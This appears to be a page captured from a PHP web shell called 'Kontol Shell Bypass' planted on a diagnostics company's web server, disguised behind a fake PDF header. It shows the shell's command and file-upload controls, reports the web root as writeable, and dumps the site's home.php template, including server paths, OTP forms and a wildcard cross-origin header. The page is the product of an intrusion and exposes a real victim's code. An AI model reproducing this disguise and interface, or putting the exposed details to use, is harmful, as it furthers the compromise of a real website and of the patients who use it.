%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardadiagnostics.in/application/views/templates/redlabel/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardadiagnostics.in/application/views/templates/redlabel/home.php
<div class="banner banBg">
    <div class="innerBann">
        <!-- Swiper -->
        <div class="swiper-container-header">
            <div class="swiper-wrapper">
                <div class="swiper-slide header-title">
                    <h1>Sharda Diagnostics</h1>
                    <h2>Booking Home Collection Made Easy</h2>
                </div>
                <div class="swiper-slide header-title">
                    <h1>Sharda Diagnostics</h1>
                    <h2>Booking Home Collection Made Easy</h2>
                </div>
                <div class="swiper-slide header-title">
                    <h1>Sharda Diagnostics</h1>
                    <h2>Booking Home Collection Made Easy</h2>
                </div>
            </div>
        </div>
        <div class="clear"></div>
        <div class="book_test_front">
        <!--<a class="btn_book_test" href="<?= LANG_URL . '/' . $pack['url'] ?>popularpackages" >Book a Test Now</a>-->
		<!-- <a class="btn_book_test" href="javascript:void(0)" onclick="return getPatientList();">Book a Test Now</a>-->
		<a class="btn_book_test" href="javascript:void(0)"  data-toggle="modal" data-target="#test-booking">Book a Test Now</a>
        <div class="clear"></div>
        <p>
            <?php if(!empty($_SESSION['logged_user'])) { ?>
            <a href="javascript:void(0);" id="healthAdvBookNow" class="btn button3 left_book_test">Talk to our Executive </a>
            <?php } else { ?>
            <a href="javascript:void(0);" id="healthAdv" class="btn button3 left_book_test">Talk to our Executive</a>
            <?php } ?>
            <a href="<?= LANG_URL . '/' . $pack['url'] ?>uploadprescription" class="ml-10 btn button3 right_book_test">Book Test from Prescription</a>
        </div>
            <div class="formForMobNo" style="display:none;">
                <span class="closeAdvisor">
                    <svg height="14px" version="1.1" viewBox="0 0 14 14" width="14px" xmlns="http://www.w3.org/2000/svg">    
                        <path d="M14,1.4 L12.6,0 L7,5.6 L1.4,0 L0,1.4 L5.6,7 L0,12.6 L1.4,14 L7,8.4 L12.6,14 L14,12.6 L8.4,7 L14,1.4 Z" id="Shape"/>            
                    </svg>
                </span>

                <form method="post" action="" class="advisorform" id="advisor_form">
                    <h4>Please enter your mobile number</h4>
                    <input type="text" name="advisor_mobile" id="advisor_mobile" placeholder="Mobile number" maxlength=10/>
                    <input type="submit" id="advisor_submit" value="submit" />
                </form>

                <div class="afterSubmit" id="otp_screen" style="display:none;">
                    <form method="post" action="" class="advisorform">
                        <h4>Please enter OTP sent to: <span id="show_mobile_number"></span></h4>
                        <input type="text" name="mobile_otp" id="mobile_otp" placeholder="Enter OTP" maxlength="4" value="" />
                        <input type="submit" id="advisor_continue" value="Continue" />
                        <div class="clear"></div>
                        <p><a href="javascript:void(0)" ng-show="mobile_read_only" style="color: #00a0a8;font-size: 12px;float: center;padding: 16px 0;" id="resend_callback_opt" value="resend otp" class="">Resend OTP ?</a></p>
                        <div class="clear"></div>
                        <p id="resend_msg" style="display:none; color:green;">OTP re-send Successfully.</p>
                        <p id="resend_error_msg" style="display:none; color:#f00;">Error on re-send otp.</p>
                    </form>
                </div>

                <div class="afterSubmit" id="call_booked_advisor" style="display:none;">
                    <h4>You have successfully connected.</h4>
                </div>
                <div class="afterSubmit" id="booked_advisor" style="display:none;">
                    <h4>You will get a call back shortly</h4>
                </div>

                <div class="clear"></div>
            </div>
        </p>
		<?php if($news){ ?>
        <div class="promotion-banner">
            <button type="button" class="btnSlide">What's new</button>
            <div class="bannerInner">
                <div id="myCarousel2" class="carousel slide testSliderOuter" data-ride="carousel">
                    <!-- Indicators -->
                    <ol class="carousel-indicators paginationBtm">
                        <?php $i=0; foreach($news as $n) { ?>
                        <li data-target="#myCarousel2" data-slide-to="<?= $i ?>" class="active"></li>
                        <?php $i++; } ?>
                    </ol>

                    <!-- Wrapper for slides -->
                    <div class="carousel-inner">
                        <?php $p=0; foreach($news as $news) { $timage = $news['image']<>'' ? $news['image'] : 'no_image.jpg'; ?>
                        <div class="item <?php if($p==0) { ?>active <?php } $p++; ?>">
                            <div class="promotionCard">
                                <img src="<?= base_url('attachments/whats_new/'.$timage) ?>">
                                <p>
                                    <?= $news['title']; ?>
                                </p>
                                <a href="<?= $news['url']; ?>">Details</a>
                            </div>
                        </div>
                        <?php } ?>
                    </div>
                </div>
            </div>
        </div>
		<?php } ?>
    </div>
    <div class="clear"></div>
    <div class="clear"></div>
</div>
<div class="clear"></div>
</div>
<div class="clear"></div>

<div class="popular_package">
    <div class="container">
        <h1>Our Most Popular Packages</h1>
        <div class="row">
            <div class="col-sm-12">
                <!-- Swiper -->
                <?php require_once(APPPATH."views/templates/redlabel/_parts/youmayalsoconsider.php"); ?>
                <div class="clear"></div>
                <?php if(count($packages)>=2) { ?>
                <div class="allPackage"><a href="<?= LANG_URL . '/' ?>popularpackages?searchstr=package">View All ‍ ‍ <i class="fa fa-long-arrow-right"></i></a></div>
                <?php } ?>
            </div>
        </div>
    </div>

</div>

<div class="clear"></div>

<div class="callBackBox">
    <div class="container">
        <div class="row">
            <h2>Free call back from our Executive <br /><span>INSTANTLY!!</span></h2>
            <div class="clear"></div>

            <form method="post" action="" class="callForm" id="getacall_form">  

                <p><input type="text" name="phone" id="getacall_phone" class="phoneno" placeholder="Your Mobile number" /><i class="fa fa-mobile"></i></p>
                <p><input type="text" name="name" id="getcall_name" class="name" placeholder="Your Name" /><i class="fa fa-user-o"></i></p>
                <p><input type="submit" id="getacall" value="Get a Call Back Now" /></p>

            </form>

            <form method="post" action="" class="callForm" id="getacall_otp" style="display:none;">
                <h3>Please Enter OTP sent to: <span id="call_mobile_number"></span></h3>
                <p><input type="text" class="phoneno" name="call_mobile_otp" id="call_mobile_otp" placeholder="Enter OTP" maxlength="4" /></p>
                <p><input type="submit" id="call_advisor_continue" value="Continue" /> </p>
                <div class="clear"></div>
                <p><a href="javascript:void(0)" ng-show="mobile_read_only" id="call_resend_opt" value="resend otp" class="">Resend OTP ?</a></p>
                <div class="clear"></div>
                <p id="call_resend_msg" style="display:none; color:green;">OTP re-send Successfully.</p>
                <p id="call_resend_error_msg" style="display:none; color:#f00;">Error on re-send otp.</p>
            </form>
        </div>
        <div class="row text-center">
            <div id="alert_msg" style="display:none;"></div>
        </div>
    </div>
</div>
<div class="clear"></div>

<div class="container singlePostBoxes">
    <h2 class="text-center">Tests by Risk Areas</h2>

    <div class="clear"></div>
    <div class="row singlePost">

        <?php foreach($riskCategories as $rckey=>$rcvalues) { 
					$risk_image = $rcvalues['risk_image']<>'' ? $rcvalues['risk_image'] : 'diabetes.png';
					$risk_name = str_replace(" ","-",strtolower($rcvalues['name']));
			  ?>
        <div class="col col-sm-6 col-md-3 col-xs-6">
            <a href="<?=base_url();?>risk/<?php echo  $risk_name;?>">
                <div class="card">
                    <figure class="figure"><img class="card-img-top" src="<?=base_url('assets/imgs/risk_areas/'.$risk_image);?>"></figure>
                    <div class="card-body">
                        <p class="card-text">
                            <?php echo $rcvalues['name']; ?>
                        </p>
                    </div>
                </div>
            </a>
        </div>
        <?php } ?>

    </div>
    <div class="clear"></div>
    <div class="allPostBtn"><a class="allpost" href="<?=base_url()?>popularpackages?searchstr=tests" role="button">View More &zwj; &zwj; <i class="fa fa-long-arrow-right"></i></a></div>
    <div class="clear"></div>
</div>
<div class="clear"></div>

<div class="courseOffered">
    <div class="container innerOffer">
        <h2 class="text-center">Courses Offered</h2>
        <div class="clear"></div>
        <div class="swiper-container singleCourse">
            <div class="swiper-wrapper">
                <?php foreach($courseOffered as $cskey=>$csvalues) {
						$course_image = $csvalues['course_image']<>'' ? 'course_image/'.$csvalues['course_image'] : 'course-img1.png';
				  ?>
                <div class="swiper-slide">
                    <div class="singalCourceBOx">
                        <div class="card courseDtl">
                            <div class="courseImg"><img class="card-img-top" src="<?=base_url('assets/imgs/'.$course_image);?>"></div>
                            <div class="fullDtl">
                                <h3>
                                    <?php echo $csvalues['course_name']; ?>
                                </h3>
                                <p class="card-text">
                                    <?php echo mb_substr($csvalues['short_description'],0,30,'UTF-8').'...'; ?>
                                </p>
                                <div class="clear"></div>
                                <div class="starNdViewer">
                                    <div class="hour"><i class="fa fa-clock-o"></i> <span><?php echo $csvalues['course_duration']; ?> Years</span></div>
                                    <!--                                        <div class="stars"><i class="fa fa-star"></i> <span>4.5</span></div>
										<div class="viewer"><i class="fa fa-eye"></i> <span>201</span></div>-->
                                </div>
                                <div class="detailOfOffer">
                                    <!--                                        <div class="lecture"><i class="fa fa-play-circle"></i> <span>39 lectures</span></div>
										<div class="hour"><i class="fa fa-clock-o"></i> <span>1.5 hrs</span></div>
										<div class="beginner"><i class="fa fa-indent"></i> <span>Beginner</span></div>-->
                                    <!--<a href="" class="applyCourseOff">Apply Now</a>-->
                                </div>
                            </div>
                            <div class="clear"></div>
                        </div>
                    </div>
                </div>
                <?php } ?>
            </div>
            <!-- If we need navigation buttons -->
            <div class="swiper-button-prev btnPrv"></div>
            <div class="swiper-button-next btnNxt"></div>
        </div>


        <div class="clear"></div>
        <div class="allPostBtn"><a class="allpost" href="<?php echo base_url();?>courcesOffered" role="button">View More &zwj; &zwj; <i class="fa fa-long-arrow-right"></i></a></div>
        <div class="clear"></div>
    </div>
    <div class="clear"></div>
</div>
<div class="clear"></div>

<div class="whyShardaDiaogna">
    <div class="container innerWhySharda">
        <div class="row">
            <div class="col col-sm-12">
                <div class="qusAns">
                    <h2>Why Sharda Diagnostics?</h2>
                    <p>From booking a health package or diagnostic test to providing you accurate results on time, we are there with you.</p>
                </div>
            </div>
            <div class="col col-sm-12 detailOfDiaogna">
                <div class="diaognaDtl">
                    <div class="row">
                        <div class="col col-md-4 col-xs-12">
                            <div class="diagnosInr">
                                <div class="diagnosleft">
                                    <div class="iconWhySharda">
                                        <img src="<?php echo base_url();?>assets/imgs/login_popup/1.png">
                                    </div>
                                </div>
                                <div class="diagnosright">
                                    <h3>Customized & Real Time Packages</h3>
                                    <p>We provide the right diagnostics packages to accommodate your health care needs. Our customized diagnostic packages are specially tailored made for you post rounds of consultations with healthcare specialists</p>
                                </div>
                            </div>
                        </div>

                        <div class="col col-md-4 col-xs-12">
                            <div class="diagnosInr">
                                <div class="diagnosleft">
                                    <div class="iconWhySharda">
                                        <img src="<?php echo base_url();?>assets/imgs/login_popup/2.png">
                                    </div>
                                </div>
                                <div class="diagnosright">
                                    <h3>Cost Effective Honest Price Guaranteed</h3>
                                    <p>We are committed to provide you premium healthcare services easily available, accessible and affordable.</p>
                                </div>
                            </div>
                        </div>

                        <div class="col col-md-4 col-xs-12">
                            <div class="diagnosInr">
                                <div class="diagnosleft">
                                    <div class="iconWhySharda">
                                        <img src="<?php echo base_url();?>assets/imgs/login_popup/3.png">
                                    </div>
                                </div>
                                <div class="diagnosright">
                                    <h3>Convenient Free Home Sample Collection</h3>
                                    <p>No long waiting & No long queues. Saves time & energy for your panned personal and professional activities Avail services at your home at convenient time.</p>
                                </div>
                            </div>
                        </div>

                        <div class="col col-md-4 col-xs-12">
                            <div class="diagnosInr">
                                <div class="diagnosleft">
                                    <div class="iconWhySharda">
                                        <img src="<?php echo base_url();?>assets/imgs/login_popup/6.png">
                                    </div>
                                </div>
                                <div class="diagnosright">
                                    <h3>NABL Accreditation</h3>
                                    <p>Our Central Laboratory -Sharda Hospital is highly focused on providing you high quality services and the NABL accreditation is a testimonial of its accurate and reliable services.</p>
                                </div>
                            </div>
                        </div>

                        <div class="col col-md-4 col-xs-12">
                            <div class="diagnosInr">
                                <div class="diagnosleft">
                                    <div class="iconWhySharda">
                                        <img src="<?php echo base_url();?>assets/imgs/login_popup/7.png">
                                    </div>
                                </div>
                                <div class="diagnosright">
                                    <h3>Qualified Doctors</h3>
                                    <p>We are proud to have a team of highly qualified doctors. Each department is headed by experienced doctor who have spent number of years in his specialization.</p>
                                </div>
                            </div>
                        </div>

                        <div class="col col-md-4 col-xs-12">
                            <div class="diagnosInr">
                                <div class="diagnosleft">
                                    <div class="iconWhySharda">
                                        <img src="<?php echo base_url();?>assets/imgs/login_popup/8.png">
                                    </div>
                                </div>
                                <div class="diagnosright">
                                    <h3>24*7 Availiable</h3>
                                    <p>Keeping Patients First- Our laboratory works 24 x 7 to cater to the needs of our people.</p>
                                </div>
                            </div>
                        </div>
                    </div>

                </div>
                <div class="clear"></div>
            </div>
        </div>
    </div>
    <div class="clear"></div>
</div>

<?php if(count($testimonials)>0) { ?>
<div class="testimonialSlide">
    <div class="container singlePostBoxes">
        <h2 class="text-center" onclick="myFunction()">Testimonial</h2>

        <div class="clear"></div>
        <div class="row testimnlPadding">
            <div class="col-sm-12">
                <div id="myCarousel" class="carousel slide testSliderOuter" data-ride="carousel">

                    <!-- Wrapper for slides -->
                    <div class="carousel-inner">
                        <?php $p=0; foreach($testimonials as $testimonial) { $timage = $testimonial['image']<>'' ? $testimonial['image'] : 'no_image.jpg'; ?>
                        <div class="item <?php if($p==0) { ?>active <?php } $p++; ?>">
                            <div class="row">
                                <div class="col col-sm-1 text-center">
                                    <?php if($timage){ ?>
                                    <img src="<?=base_url('assets/imgs/testimonials_image/'.$timage); ?>" class="testImg">
                                    <?php } else { ?>
                                    <img src="<?=base_url('assets/imgs/testimonials_image/test1.png')?>" class="testImg">
                                    <?php } ?>
                                </div>
                                <div class="col col-sm-11">
                                    <div class="testimonialDetls">
                                        <p>
                                            <?=$testimonial['description'] ?>
                                        </p>
                                        <h4>-
                                            <?=$testimonial['name'] ?>
                                        </h4>
                                        <p class="testimonial_subtitle"><span><?=$testimonial['city'] ?></span><br>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <?php } ?>
                    </div>
                    <!-- Left and right controls -->
                    <a class="left carousel-control" href="#myCarousel" data-slide="prev">
                          <span class="glyphicon glyphicon-menu-left arrowTestLeft"></span>
                          <span class="sr-only">Previous</span>
                    </a>
                    <a class="right carousel-control" href="#myCarousel" data-slide="next">
                        <span class="glyphicon glyphicon-menu-right arrowTestRight"></span>
                          <span class="sr-only">Next</span>
                    </a>
                </div>
            </div>
        </div>
    </div>
</div>
<?php } ?>
<div id="snackbar">Some text some message..</div>

<!-- Modal -->
<div class="modal fade" id="test-booking" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
  <div class="modal-dialog modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
        <h4 class="modal-title" id="myModalLabel">Book a Test now </h4>
      </div>
      <div class="modal-body">
        <div class="row">
			<?php 
			   $getServicetype = $this->Public_model->getServicetype();
			   foreach($getServicetype as $Servicetype) { 
							$Servicetype = $Servicetype['service_type'];
							$checked = '';
				if(!empty($Servicetype)) {			
				?>
				<div class="col-sm-3">
					<a href="<?=base_url('popularpackages')?>?test_type=<?php echo $Servicetype;?>">
						<div class="box">
							<h6><?=$Servicetype?></h6>
						</div>
					</a>
				</div>
			   <?php } } ?>
						
		</div>
      </div>
      <div class="modal-footer">
        <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
      </div>
    </div>
  </div>
</div>
<!-- /Modal -->
<?php
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept');
?>

<script>
    function myFunction() {
        var x = document.getElementById("snackbar");
        x.className = "show";
        setTimeout(function() {
            x.className = x.className.replace("show", "");
        }, 3000);
    }
    var swiper = new Swiper('.swiper-container-header', {
        scrollbar: {
            el: '.swiper-scrollbar',
            hide: true,
        },
        autoplay: {
            delay: 5000,
        },
        slidesPerView: '1',
        centeredSlides: true,

    });
</script>

Kontol Shell Bypass